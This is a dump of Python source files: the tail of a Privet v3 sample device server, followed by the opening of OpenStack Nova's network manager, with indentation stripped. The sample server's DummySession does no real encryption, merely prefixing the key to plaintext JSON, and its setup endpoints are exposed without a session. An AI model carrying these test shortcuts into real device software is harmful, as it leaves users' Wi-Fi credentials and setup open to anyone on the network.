return self.function
return None
def cancel(self):
self.function = None
class DummySession(object):
"""Handles sessions."""
def __init__(self, session_id):
self.session_id = session_id
self.key = None
def do_step(self, step, package):
if step != 0:
raise self.InvalidStepError()
self.key = package
return self.key
def decrypt(self, cyphertext):
return json.loads(cyphertext[len(self.key):])
def encrypt(self, plain_data):
return self.key + json.dumps(plain_data)
def get_session_id(self):
return self.session_id
def get_stype(self):
return 'dummy'
def get_status(self):
return 'complete'
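  # For illustration: DummySession performs no real encryption; with key 'k',
  # encrypt({'a': 1}) returns 'k{"a": 1}' and decrypt() just strips the key
  # prefix before JSON-decoding, so it is only suitable for local testing.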
class EmptySession(object):
"""Handles sessions."""
def __init__(self, session_id):
self.session_id = session_id
self.key = None
def do_step(self, step, package):
if step != 0 or package != '':
raise self.InvalidStepError()
return ''
def decrypt(self, cyphertext):
return json.loads(cyphertext)
def encrypt(self, plain_data):
return json.dumps(plain_data)
def get_session_id(self):
return self.session_id
def get_stype(self):
return 'empty'
def get_status(self):
return 'complete'
def __init__(self, ioloop, state):
self.config = Config()
if self.config['on_real_device']:
mdns_wrappers = CommandWrapperReal
wifi_handler = WifiHandlerReal
else:
mdns_wrappers = CommandWrapperReal
wifi_handler = WifiHandlerPassthrough
if self.config['led_path']:
cloud_wrapper = CloudCommandHandlerReal(ioloop,
self.config['led_path'])
self.setup_real(self.config['led_path'])
else:
cloud_wrapper = CloudCommandHandlerFake(ioloop)
self.setup_fake()
self.setup_ssid = _DEVICE_SETUP_SSID % random.randint(0,99)
self.cloud_device = CloudDevice(ioloop, state, self.config,
cloud_wrapper, self)
self.wifi_handler = wifi_handler(ioloop, state, self.config,
self.setup_ssid, self)
self.mdns_wrapper = MDnsWrapper(mdns_wrappers)
self.on_wifi = False
self.registered = False
self.in_session = False
self.ioloop = ioloop
self.handlers = {
'/internal/ping': self.do_ping,
'/privet/info': self.do_info,
'/deprecated/wifi/switch': self.do_wifi_switch,
'/privet/v3/session/handshake': self.do_session_handshake,
'/privet/v3/session/cancel': self.do_session_cancel,
'/privet/v3/session/request': self.do_session_call,
'/privet/v3/setup/start':
self.get_insecure_api_handler(self.do_secure_setup_start),
'/privet/v3/setup/cancel':
self.get_insecure_api_handler(self.do_secure_setup_cancel),
'/privet/v3/setup/status':
self.get_insecure_api_handler(self.do_secure_status),
}
self.current_session = None
self.session_cancel_callback = None
self.session_handlers = {
'dummy': self.DummySession,
'empty': self.EmptySession
}
self.secure_handlers = {
'/privet/v3/setup/start': self.do_secure_setup_start,
'/privet/v3/setup/cancel': self.do_secure_setup_cancel,
'/privet/v3/setup/status': self.do_secure_status
}
@staticmethod
def setup_fake():
print 'Skipping device setup'
@staticmethod
def setup_real(led_path):
file_trigger = open(os.path.join(led_path, 'trigger'), 'w')
file_trigger.write('none')
file_trigger.close()
def start(self):
self.wifi_handler.start()
self.mdns_wrapper.set_setup_name(self.setup_ssid)
self.mdns_wrapper.start()
@get_only
def do_ping(self, unused_request, response_func):
response_func(200, {'pong': True})
return True
@get_only
def do_public_info(self, unused_request, response_func):
info = dict(self.get_common_info().items() + {
'stype': self.session_handlers.keys()}.items())
response_func(200, info)
@get_only
def do_info(self, unused_request, response_func):
specific_info = {
'x-privet-token': 'sample',
'api': sorted(self.handlers.keys())
}
info = dict(self.get_common_info().items() + specific_info.items())
response_func(200, info)
return True
@post_only
@wifi_provisioning
def do_wifi_switch(self, request, response_func):
"""Handles /deprecated/wifi/switch requests."""
data = json.loads(request.body)
try:
ssid = data['ssid']
passw = data['passw']
except KeyError:
print 'Malformed content: ' + repr(data)
response_func(400, {'error': 'invalidParams'})
traceback.print_exc()
return True
response_func(200, {'ssid': ssid})
self.wifi_handler.switch_to_wifi(ssid, passw, None)
# TODO(noamsml): Return to normal wifi after timeout (cancelable)
return True
@post_only
def do_session_handshake(self, request, response_func):
"""Handles /privet/v3/session/handshake requests."""
data = json.loads(request.body)
try:
stype = data['keyExchangeType']
step = data['step']
package = base64.b64decode(data['package'])
if 'sessionID' in data:
session_id = data['sessionID']
else:
session_id = "dummy"
except (KeyError, TypeError):
traceback.print_exc()
print 'Malformed content: ' + repr(data)
response_func(400, {'error': 'invalidParams'})
return True
if self.current_session:
if session_id != self.current_session.get_session_id():
response_func(400, {'error': 'maxSessionsExceeded'})
return True
if stype != self.current_session.get_stype():
response_func(400, {'error': 'unsupportedKeyExchangeType'})
return True
else:
if stype not in self.session_handlers:
response_func(400, {'error': 'unsupportedKeyExchangeType'})
return True
self.current_session = self.session_handlers[stype](session_id)
try:
output_package = self.current_session.do_step(step, package)
except self.InvalidStepError:
response_func(400, {'error': 'invalidStep'})
return True
except self.InvalidPackageError:
response_func(400, {'error': 'invalidPackage'})
return True
return_obj = {
'status': self.current_session.get_status(),
'step': step,
'package': base64.b64encode(output_package),
'sessionID': session_id
}
response_func(200, return_obj)
self.post_session_cancel()
return True
@post_only
def do_session_cancel(self, request, response_func):
"""Handles /privet/v3/session/cancel requests."""
data = json.loads(request.body)
try:
session_id = data['sessionID']
except KeyError:
response_func(400, {'error': 'invalidParams'})
return True
if self.current_session and session_id == self.current_session.session_id:
self.current_session = None
if self.session_cancel_callback:
self.session_cancel_callback.cancel()
response_func(200, {'status': 'cancelled', 'sessionID': session_id})
else:
response_func(400, {'error': 'unknownSession'})
return True
@post_only
def do_session_call(self, request, response_func):
"""Handles /privet/v3/session/call requests."""
try:
session_id = request.headers['X-Privet-SessionID']
except KeyError:
response_func(400, {'error': 'unknownSession'})
return True
if (not self.current_session or
session_id != self.current_session.session_id):
response_func(400, {'error': 'unknownSession'})
return True
try:
decrypted = self.current_session.decrypt(request.body)
except self.EncryptionError:
response_func(400, {'error': 'encryptionError'})
return True
def encrypted_response_func(code, data):
if 'error' in data:
self.encrypted_send_response(request, code, dict(data.items() + {
'api': decrypted['api']
}.items()))
else:
self.encrypted_send_response(request, code, {
'api': decrypted['api'],
'output': data
})
if ('api' not in decrypted or 'input' not in decrypted or
type(decrypted['input']) != dict):
print 'Invalid params in API stage'
encrypted_response_func(200, {'error': 'invalidParams'})
return True
if decrypted['api'] in self.secure_handlers:
self.secure_handlers[decrypted['api']](request,
encrypted_response_func,
decrypted['input'])
else:
encrypted_response_func(200, {'error': 'unknownApi'})
self.post_session_cancel()
return True
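  # Illustrative sketch (added comment, not part of the original sample): a
  # decrypted /privet/v3/session/request body handled above looks roughly like
  #   {"api": "/privet/v3/setup/start",
  #    "input": {"wifi": {"ssid": "HomeAP", "passphrase": "secret"}}}
  # ("HomeAP"/"secret" are made-up values). The reply is re-encrypted as
  # {"api": ..., "output": ...}, or, on failure, the handler's error dict
  # merged with the "api" key.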
def get_insecure_api_handler(self, handler):
def inner(request, func):
return self.insecure_api_handler(request, func, handler)
return inner
@post_only
def insecure_api_handler(self, request, response_func, handler):
real_params = json.loads(request.body) if request.body else {}
handler(request, response_func, real_params)
return True
def do_secure_status(self, unused_request, response_func, unused_params):
"""Handles /privet/v3/setup/status requests."""
setup = {
'registration': {
'required': True
},
'wifi': {
'required': True
}
}
if self.on_wifi:
setup['wifi']['status'] = 'complete'
setup['wifi']['ssid'] = '' # TODO(noamsml): Add SSID to status
else:
setup['wifi']['status'] = 'available'
if self.cloud_device.get_device_id():
setup['registration']['status'] = 'complete'
setup['registration']['id'] = self.cloud_device.get_device_id()
else:
setup['registration']['status'] = 'available'
response_func(200, setup)
def do_secure_setup_start(self, unused_request, response_func, params):
"""Handles /privet/v3/setup/start requests."""
has_wifi = False
token = None
try:
if 'wifi' in params:
has_wifi = True
ssid = params['wifi']['ssid']
passw = params['wifi']['passphrase']
if 'registration' in params:
token = params['registration']['ticketID']
except KeyError:
print 'Invalid params in bootstrap stage'
response_func(400, {'error': 'invalidParams'})
return
try:
if has_wifi:
self.wifi_handler.switch_to_wifi(ssid, passw, token)
elif token:
self.cloud_device.register(token)
else:
response_func(400, {'error': 'invalidParams'})
return
except HttpError as e:
print e # TODO(noamsml): store error message in this case
self.do_secure_status(unused_request, response_func, params)
def do_secure_setup_cancel(self, request, response_func, params):
pass
def handle_request(self, request):
def response_func(code, data):
self.real_send_response(request, code, data)
handled = False
print '[INFO] %s %s' % (request.method, request.path)
if request.path in self.handlers:
handled = self.handlers[request.path](request, response_func)
if not handled:
self.real_send_response(request, 404, {'error': 'notFound'})
def encrypted_send_response(self, request, code, data):
self.raw_send_response(request, code,
self.current_session.encrypt(data))
def real_send_response(self, request, code, data):
data = json.dumps(data, sort_keys=True, indent=2, separators=(',', ': '))
data += '\n'
self.raw_send_response(request, code, data)
def raw_send_response(self, request, code, data):
request.write('HTTP/1.1 %d Maybe OK\n' % code)
request.write('Content-Type: application/json\n')
request.write('Content-Length: %s\n\n' % len(data))
request.write(data)
request.finish()
def device_state(self):
return 'idle'
def get_common_info(self):
return {
'version': '3.0',
'name': 'Sample Device',
'device_state': self.device_state()
}
def post_session_cancel(self):
if self.session_cancel_callback:
self.session_cancel_callback.cancel()
self.session_cancel_callback = self.CancelableClosure(self.session_cancel)
self.ioloop.add_timeout(datetime.timedelta(minutes=2),
self.session_cancel_callback)
def session_cancel(self):
self.current_session = None
# WifiHandler.Delegate implementation
def on_wifi_connected(self, token):
self.mdns_wrapper.set_setup_name(None)
self.cloud_device.try_start(token)
self.on_wifi = True
def on_device_started(self):
self.mdns_wrapper.set_id(self.cloud_device.get_device_id())
def on_device_stopped(self):
pass
def stop(self):
self.wifi_handler.stop()
self.cloud_device.stop()
def main():
state = State()
state.load()
ioloop = IOLoop.instance()
handler = WebRequestHandler(ioloop, state)
handler.start()
def logic_stop():
handler.stop()
atexit.register(logic_stop)
server = HTTPServer(handler.handle_request)
server.listen(_DEVICE_PORT)
ioloop.start()
if __name__ == '__main__':
main()
|
NoBodyCam/TftpPxeBootBareMetal | refs/heads/tftp_pxe_boot | nova/network/manager.py | 1 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Network Hosts are responsible for allocating ips and setting up network.
There are multiple backend drivers that handle specific types of networking
topologies. All of the network commands are issued to a subclass of
:class:`NetworkManager`.
**Related Flags**
:network_driver: Driver to use for network creation
:flat_network_bridge: Bridge device for simple network instances
:flat_interface: FlatDhcp will bridge into this interface if set
:flat_network_dns: Dns for simple network
:vlan_start: First VLAN for private networks
:vpn_ip: Public IP for the cloudpipe VPN servers
:vpn_start: First Vpn port for private networks
:cnt_vpn_clients: Number of addresses reserved for vpn clients
:network_size: Number of addresses in each private subnet
:floating_range: Floating IP address block
:fixed_range: Fixed IP address block
:fixed_ip_disassociate_timeout: Seconds after which a deallocated ip
is disassociated
:create_unique_mac_address_attempts: Number of times to attempt creating
a unique mac address
"""
import datetime
import functools
import itertools
import math
import re
import socket
from eventlet import greenpool
import netaddr
from nova.compute import api as compute_api
from nova import context
from nova import exception
from nova import flags
from nova import ipv6
from nova import manager
from nova.network import api as network_api
from nova.network import model as network_model
from nova.openstack.common import cfg
from nova.openstack.common import excutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common.notifier import api as notifier
from nova.openstack.common import rpc
from nova.openstack.common import timeutils
import nova.policy
from nova import quota
from nova import utils
LOG = logging.getLogger(__name__)
QUOTAS = quota.QUOTAS
network_opts = [
cfg.StrOpt('flat_network_bridge',
default=None,
help='Bridge for simple network instances'),
cfg.StrOpt('flat_network_dns',
default='8.8.4.4',
help='Dns for simple network'),
cfg.BoolOpt('flat_injected',
default=False,
help='Whether to attempt to inject network setup into guest'),
cfg.StrOpt('flat_interface',
default=None,
help='FlatDhcp will bridge into this interface if set'),
cfg.IntOpt('vlan_start',
default=100,
help='First VLAN for private networks'),
cfg.StrOpt('vlan_interface',
default=None,
help='vlans will bridge into this interface if set'),
cfg.IntOpt('num_networks',
default=1,
help='Number of networks to support'),
cfg.StrOpt('vpn_ip',
default='$my_ip',
help='Public IP for the cloudpipe VPN servers'),
cfg.IntOpt('vpn_start',
default=1000,
help='First Vpn port for private networks'),
cfg.BoolOpt('multi_host',
default=False,
help='Default value for multi_host in networks'),
cfg.IntOpt('network_size',
default=256,
help='Number of addresses in each private subnet'),
cfg.StrOpt('floating_range',
default='4.4.4.0/24',
help='Floating IP address block'),
cfg.StrOpt('default_floating_pool',
default='nova',
help='Default pool for floating ips'),
cfg.StrOpt('fixed_range',
default='10.0.0.0/8',
help='Fixed IP address block'),
cfg.StrOpt('fixed_range_v6',
default='fd00::/48',
help='Fixed IPv6 address block'),
cfg.StrOpt('gateway',
default=None,
help='Default IPv4 gateway'),
cfg.StrOpt('gateway_v6',
default=None,
help='Default IPv6 gateway'),
cfg.IntOpt('cnt_vpn_clients',
default=0,
help='Number of addresses reserved for vpn clients'),
cfg.IntOpt('fixed_ip_disassociate_timeout',
default=600,
help='Seconds after which a deallocated ip is disassociated'),
cfg.IntOpt('create_unique_mac_address_attempts',
default=5,
help='Number of attempts to create unique mac address'),
cfg.BoolOpt('auto_assign_floating_ip',
default=False,
help='Autoassigning floating ip to VM'),
cfg.StrOpt('network_host',
default=socket.gethostname(),
help='Network host to use for ip allocation in flat modes'),
cfg.BoolOpt('fake_call',
default=False,
help='If True, skip using the queue and make local calls'),
cfg.BoolOpt('force_dhcp_release',
default=False,
help='If True, send a dhcp release on instance termination'),
cfg.StrOpt('dhcp_domain',
default='novalocal',
help='domain to use for building the hostnames'),
cfg.StrOpt('l3_lib',
default='nova.network.l3.LinuxNetL3',
help="Indicates underlying L3 management library")
]
FLAGS = flags.FLAGS
FLAGS.register_opts(network_opts)
class AddressAlreadyAllocated(exception.NovaException):
"""Address was already allocated."""
pass
class RPCAllocateFixedIP(object):
"""Mixin class originally for FlatDCHP and VLAN network managers.
used since they share code to RPC.call allocate_fixed_ip on the
correct network host to configure dnsmasq
"""
def _allocate_fixed_ips(self, context, instance_id, host, networks,
**kwargs):
"""Calls allocate_fixed_ip once for each network."""
green_pool = greenpool.GreenPool()
vpn = kwargs.get('vpn')
requested_networks = kwargs.get('requested_networks')
for network in networks:
address = None
if requested_networks is not None:
for address in (fixed_ip for (uuid, fixed_ip) in
requested_networks if network['uuid'] == uuid):
break
# NOTE(vish): if we are not multi_host pass to the network host
# NOTE(tr3buchet): but if we are, host came from instance['host']
if not network['multi_host']:
host = network['host']
# NOTE(vish): if there is no network host, set one
if host is None:
host = rpc.call(context, FLAGS.network_topic,
{'method': 'set_network_host',
'args': {'network_ref':
jsonutils.to_primitive(network)}})
if host != self.host:
# need to call allocate_fixed_ip to correct network host
topic = rpc.queue_get_for(context, FLAGS.network_topic, host)
args = {}
args['instance_id'] = instance_id
args['network_id'] = network['id']
args['address'] = address
args['vpn'] = vpn
green_pool.spawn_n(rpc.call, context, topic,
{'method': '_rpc_allocate_fixed_ip',
'args': args})
else:
# i am the correct host, run here
self.allocate_fixed_ip(context, instance_id, network,
vpn=vpn, address=address)
# wait for all of the allocates (if any) to finish
green_pool.waitall()
def _rpc_allocate_fixed_ip(self, context, instance_id, network_id,
**kwargs):
"""Sits in between _allocate_fixed_ips and allocate_fixed_ip to
perform network lookup on the far side of rpc.
"""
network = self._get_network_by_id(context, network_id)
return self.allocate_fixed_ip(context, instance_id, network, **kwargs)
def deallocate_fixed_ip(self, context, address, host, **kwargs):
"""Call the superclass deallocate_fixed_ip if i'm the correct host
otherwise call to the correct host"""
fixed_ip = self.db.fixed_ip_get_by_address(context, address)
network = self._get_network_by_id(context, fixed_ip['network_id'])
# NOTE(vish): if we are not multi_host pass to the network host
# NOTE(tr3buchet): but if we are, host came from instance['host']
if not network['multi_host']:
host = network['host']
if host != self.host:
# need to call deallocate_fixed_ip on correct network host
topic = rpc.queue_get_for(context, FLAGS.network_topic, host)
args = {'address': address,
'host': host}
rpc.call(context, topic,
{'method': 'deallocate_fixed_ip',
'args': args})
else:
# i am the correct host, run here
super(RPCAllocateFixedIP, self).deallocate_fixed_ip(context,
address)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution"""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
nova.policy.enforce(context, _action, target)
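# Illustrative sketch (added comment): for a decorated method named
# allocate_for_instance, check_policy() above enforces the rule keyed
# "network:allocate_for_instance" against the request context, e.g. a
# hypothetical policy.json entry:
#   {"network:allocate_for_instance": "rule:admin_or_owner"}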
class FloatingIP(object):
"""Mixin class for adding floating IP functionality to a manager."""
def init_host_floating_ips(self):
"""Configures floating ips owned by host."""
admin_context = context.get_admin_context()
try:
floating_ips = self.db.floating_ip_get_all_by_host(admin_context,
self.host)
except exception.NotFound:
return
for floating_ip in floating_ips:
fixed_ip_id = floating_ip.get('fixed_ip_id')
if fixed_ip_id:
try:
fixed_ip_ref = self.db.fixed_ip_get(admin_context,
fixed_ip_id)
except exception.FixedIpNotFound:
msg = _('Fixed ip %(fixed_ip_id)s not found') % locals()
LOG.debug(msg)
continue
fixed_address = fixed_ip_ref['address']
interface = FLAGS.public_interface or floating_ip['interface']
try:
self.l3driver.add_floating_ip(floating_ip['address'],
fixed_address, interface)
except exception.ProcessExecutionError:
LOG.debug(_('Interface %(interface)s not found'), locals())
raise exception.NoFloatingIpInterface(interface=interface)
@wrap_check_policy
def allocate_for_instance(self, context, **kwargs):
"""Handles allocating the floating IP resources for an instance.
calls super class allocate_for_instance() as well
rpc.called by network_api
"""
instance_id = kwargs.get('instance_id')
instance_uuid = kwargs.get('instance_uuid')
project_id = kwargs.get('project_id')
requested_networks = kwargs.get('requested_networks')
LOG.debug(_("floating IP allocation for instance |%s|"),
instance_uuid=instance_uuid, context=context)
# call the next inherited class's allocate_for_instance()
# which is currently the NetworkManager version
# do this first so fixed ip is already allocated
nw_info = super(FloatingIP, self).allocate_for_instance(context,
**kwargs)
if FLAGS.auto_assign_floating_ip:
# allocate a floating ip
floating_address = self.allocate_floating_ip(context, project_id)
# set auto_assigned column to true for the floating ip
self.db.floating_ip_set_auto_assigned(context, floating_address)
# get the first fixed address belonging to the instance
fixed_ips = nw_info.fixed_ips()
fixed_address = fixed_ips[0]['address']
# associate the floating ip to fixed_ip
self.associate_floating_ip(context,
floating_address,
fixed_address,
affect_auto_assigned=True)
return nw_info
@wrap_check_policy
def deallocate_for_instance(self, context, **kwargs):
"""Handles deallocating floating IP resources for an instance.
calls super class deallocate_for_instance() as well.
rpc.called by network_api
"""
instance_id = kwargs.get('instance_id')
# NOTE(francois.charlier): in some cases the instance might be
# deleted before the IPs are released, so we need to get deleted
# instances too
read_deleted_context = context.elevated(read_deleted='yes')
instance = self.db.instance_get(read_deleted_context, instance_id)
LOG.debug(_("floating IP deallocation for instance |%s|"),
instance=instance, context=read_deleted_context)
try:
fixed_ips = self.db.fixed_ip_get_by_instance(read_deleted_context,
instance['uuid'])
except exception.FixedIpNotFoundForInstance:
fixed_ips = []
# add to kwargs so we can pass to super to save a db lookup there
kwargs['fixed_ips'] = fixed_ips
for fixed_ip in fixed_ips:
fixed_id = fixed_ip['id']
floating_ips = self.db.floating_ip_get_by_fixed_ip_id(context,
fixed_id)
# disassociate floating ips related to fixed_ip
for floating_ip in floating_ips:
address = floating_ip['address']
try:
self.disassociate_floating_ip(read_deleted_context,
address,
affect_auto_assigned=True)
except exception.FloatingIpNotAssociated:
LOG.exception(_("Floating IP is not associated. Ignore."))
# deallocate if auto_assigned
if floating_ip['auto_assigned']:
self.deallocate_floating_ip(read_deleted_context, address,
affect_auto_assigned=True)
# call the next inherited class's deallocate_for_instance()
# which is currently the NetworkManager version
# call this after so floating IPs are handled first
super(FloatingIP, self).deallocate_for_instance(context, **kwargs)
def _floating_ip_owned_by_project(self, context, floating_ip):
"""Raises if floating ip does not belong to project"""
if floating_ip['project_id'] != context.project_id:
if floating_ip['project_id'] is None:
LOG.warn(_('Address |%(address)s| is not allocated'),
{'address': floating_ip['address']})
raise exception.NotAuthorized()
else:
LOG.warn(_('Address |%(address)s| is not allocated to your '
'project |%(project)s|'),
{'address': floating_ip['address'],
'project': context.project_id})
raise exception.NotAuthorized()
@wrap_check_policy
def allocate_floating_ip(self, context, project_id, pool=None):
"""Gets a floating ip from the pool."""
# NOTE(tr3buchet): all network hosts in zone now use the same pool
pool = pool or FLAGS.default_floating_pool
# Check the quota; can't put this in the API because we get
# called into from other places
try:
reservations = QUOTAS.reserve(context, floating_ips=1)
except exception.OverQuota:
pid = context.project_id
LOG.warn(_("Quota exceeded for %(pid)s, tried to allocate "
"floating IP") % locals())
raise exception.FloatingIpLimitExceeded()
try:
floating_ip = self.db.floating_ip_allocate_address(context,
project_id,
pool)
payload = dict(project_id=project_id, floating_ip=floating_ip)
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.allocate',
notifier.INFO, payload)
# Commit the reservations
QUOTAS.commit(context, reservations)
except Exception:
with excutils.save_and_reraise_exception():
QUOTAS.rollback(context, reservations)
return floating_ip
@wrap_check_policy
def deallocate_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Returns an floating ip to the pool."""
floating_ip = self.db.floating_ip_get_by_address(context, address)
# handle auto_assigned
if not affect_auto_assigned and floating_ip.get('auto_assigned'):
return
        # make sure project owns this floating ip (allocated)
self._floating_ip_owned_by_project(context, floating_ip)
# make sure floating ip is not associated
if floating_ip['fixed_ip_id']:
floating_address = floating_ip['address']
raise exception.FloatingIpAssociated(address=floating_address)
# clean up any associated DNS entries
self._delete_all_entries_for_ip(context,
floating_ip['address'])
payload = dict(project_id=floating_ip['project_id'],
floating_ip=floating_ip['address'])
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.deallocate',
notifier.INFO, payload=payload)
# Get reservations...
try:
reservations = QUOTAS.reserve(context, floating_ips=-1)
except Exception:
reservations = None
LOG.exception(_("Failed to update usages deallocating "
"floating IP"))
self.db.floating_ip_deallocate(context, address)
# Commit the reservations
if reservations:
QUOTAS.commit(context, reservations)
@wrap_check_policy
def associate_floating_ip(self, context, floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Makes sure everything makes sense then calls _associate_floating_ip,
rpc'ing to correct host if i'm not it.
"""
floating_ip = self.db.floating_ip_get_by_address(context,
floating_address)
# handle auto_assigned
if not affect_auto_assigned and floating_ip.get('auto_assigned'):
return
        # make sure project owns this floating ip (allocated)
self._floating_ip_owned_by_project(context, floating_ip)
# disassociate any already associated
orig_instance_uuid = None
if floating_ip['fixed_ip_id']:
# find previously associated instance
fixed_ip = self.db.fixed_ip_get(context,
floating_ip['fixed_ip_id'])
orig_instance_uuid = fixed_ip['instance_uuid']
self.disassociate_floating_ip(context, floating_address)
fixed_ip = self.db.fixed_ip_get_by_address(context, fixed_address)
# send to correct host, unless i'm the correct host
network = self._get_network_by_id(context.elevated(),
fixed_ip['network_id'])
if network['multi_host']:
instance = self.db.instance_get_by_uuid(context,
fixed_ip['instance_uuid'])
host = instance['host']
else:
host = network['host']
interface = FLAGS.public_interface or floating_ip['interface']
if host == self.host:
# i'm the correct host
self._associate_floating_ip(context, floating_address,
fixed_address, interface)
else:
# send to correct host
rpc.call(context,
rpc.queue_get_for(context, FLAGS.network_topic, host),
{'method': '_associate_floating_ip',
'args': {'floating_address': floating_address,
'fixed_address': fixed_address,
'interface': interface}})
return orig_instance_uuid
def _associate_floating_ip(self, context, floating_address, fixed_address,
interface):
"""Performs db and driver calls to associate floating ip & fixed ip"""
# associate floating ip
self.db.floating_ip_fixed_ip_associate(context,
floating_address,
fixed_address,
self.host)
try:
# gogo driver time
self.l3driver.add_floating_ip(floating_address, fixed_address,
interface)
except exception.ProcessExecutionError as e:
fixed_address = self.db.floating_ip_disassociate(context,
floating_address)
if "Cannot find device" in str(e):
LOG.error(_('Interface %(interface)s not found'), locals())
raise exception.NoFloatingIpInterface(interface=interface)
payload = dict(project_id=context.project_id,
floating_ip=floating_address)
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.associate',
notifier.INFO, payload=payload)
@wrap_check_policy
def disassociate_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from its fixed ip.
Makes sure everything makes sense then calls _disassociate_floating_ip,
rpc'ing to correct host if i'm not it.
"""
floating_ip = self.db.floating_ip_get_by_address(context, address)
# handle auto assigned
if not affect_auto_assigned and floating_ip.get('auto_assigned'):
return
        # make sure project owns this floating ip (allocated)
self._floating_ip_owned_by_project(context, floating_ip)
# make sure floating ip is associated
if not floating_ip.get('fixed_ip_id'):
floating_address = floating_ip['address']
raise exception.FloatingIpNotAssociated(address=floating_address)
fixed_ip = self.db.fixed_ip_get(context, floating_ip['fixed_ip_id'])
# send to correct host, unless i'm the correct host
network = self._get_network_by_id(context, fixed_ip['network_id'])
if network['multi_host']:
instance = self.db.instance_get_by_uuid(context,
fixed_ip['instance_uuid'])
host = instance['host']
else:
host = network['host']
interface = FLAGS.public_interface or floating_ip['interface']
if host == self.host:
# i'm the correct host
self._disassociate_floating_ip(context, address, interface)
else:
# send to correct host
rpc.call(context,
rpc.queue_get_for(context, FLAGS.network_topic, host),
{'method': '_disassociate_floating_ip',
'args': {'address': address,
'interface': interface}})
def _disassociate_floating_ip(self, context, address, interface):
"""Performs db and driver calls to disassociate floating ip"""
# disassociate floating ip
fixed_address = self.db.floating_ip_disassociate(context, address)
# go go driver time
self.l3driver.remove_floating_ip(address, fixed_address, interface)
payload = dict(project_id=context.project_id, floating_ip=address)
notifier.notify(context,
notifier.publisher_id("network"),
'network.floating_ip.disassociate',
notifier.INFO, payload=payload)
@wrap_check_policy
def get_floating_ip(self, context, id):
"""Returns a floating IP as a dict"""
return dict(self.db.floating_ip_get(context, id).iteritems())
@wrap_check_policy
def get_floating_pools(self, context):
"""Returns list of floating pools"""
pools = self.db.floating_ip_get_pools(context)
return [dict(pool.iteritems()) for pool in pools]
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
"""Returns a floating IP as a dict"""
return dict(self.db.floating_ip_get_by_address(context,
address).iteritems())
@wrap_check_policy
def get_floating_ips_by_project(self, context):
"""Returns the floating IPs allocated to a project"""
ips = self.db.floating_ip_get_all_by_project(context,
context.project_id)
return [dict(ip.iteritems()) for ip in ips]
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
"""Returns the floating IPs associated with a fixed_address"""
floating_ips = self.db.floating_ip_get_by_fixed_address(context,
fixed_address)
return [floating_ip['address'] for floating_ip in floating_ips]
def _prepare_domain_entry(self, context, domain):
domainref = self.db.dnsdomain_get(context, domain)
scope = domainref.scope
if scope == 'private':
av_zone = domainref.availability_zone
this_domain = {'domain': domain,
'scope': scope,
'availability_zone': av_zone}
else:
project = domainref.project_id
this_domain = {'domain': domain,
'scope': scope,
'project': project}
return this_domain
@wrap_check_policy
def get_dns_domains(self, context):
domains = []
db_domain_list = self.db.dnsdomain_list(context)
floating_driver_domain_list = self.floating_dns_manager.get_domains()
instance_driver_domain_list = self.instance_dns_manager.get_domains()
for db_domain in db_domain_list:
if (db_domain in floating_driver_domain_list or
db_domain in instance_driver_domain_list):
domain_entry = self._prepare_domain_entry(context,
db_domain)
if domain_entry:
domains.append(domain_entry)
else:
LOG.warn(_('Database inconsistency: DNS domain |%s| is '
'registered in the Nova db but not visible to '
'either the floating or instance DNS driver. It '
'will be ignored.'), db_domain)
return domains
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
self.floating_dns_manager.create_entry(name, address,
dns_type, domain)
@wrap_check_policy
def modify_dns_entry(self, context, address, name, domain):
self.floating_dns_manager.modify_address(name, address,
domain)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
self.floating_dns_manager.delete_entry(name, domain)
def _delete_all_entries_for_ip(self, context, address):
domain_list = self.get_dns_domains(context)
for domain in domain_list:
names = self.get_dns_entries_by_address(context,
address,
domain['domain'])
for name in names:
self.delete_dns_entry(context, name, domain['domain'])
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
return self.floating_dns_manager.get_entries_by_address(address,
domain)
@wrap_check_policy
def get_dns_entries_by_name(self, context, name, domain):
return self.floating_dns_manager.get_entries_by_name(name,
domain)
@wrap_check_policy
def create_private_dns_domain(self, context, domain, av_zone):
self.db.dnsdomain_register_for_zone(context, domain, av_zone)
try:
self.instance_dns_manager.create_domain(domain)
except exception.FloatingIpDNSExists:
LOG.warn(_('Domain |%(domain)s| already exists, '
'changing zone to |%(av_zone)s|.'),
{'domain': domain, 'av_zone': av_zone})
@wrap_check_policy
def create_public_dns_domain(self, context, domain, project):
self.db.dnsdomain_register_for_project(context, domain, project)
try:
self.floating_dns_manager.create_domain(domain)
except exception.FloatingIpDNSExists:
LOG.warn(_('Domain |%(domain)s| already exists, '
'changing project to |%(project)s|.'),
{'domain': domain, 'project': project})
@wrap_check_policy
def delete_dns_domain(self, context, domain):
self.db.dnsdomain_unregister(context, domain)
self.floating_dns_manager.delete_domain(domain)
def _get_project_for_domain(self, context, domain):
return self.db.dnsdomain_project(context, domain)
class NetworkManager(manager.SchedulerDependentManager):
"""Implements common network manager functionality.
This class must be subclassed to support specific topologies.
host management:
hosts configure themselves for networks they are assigned to in the
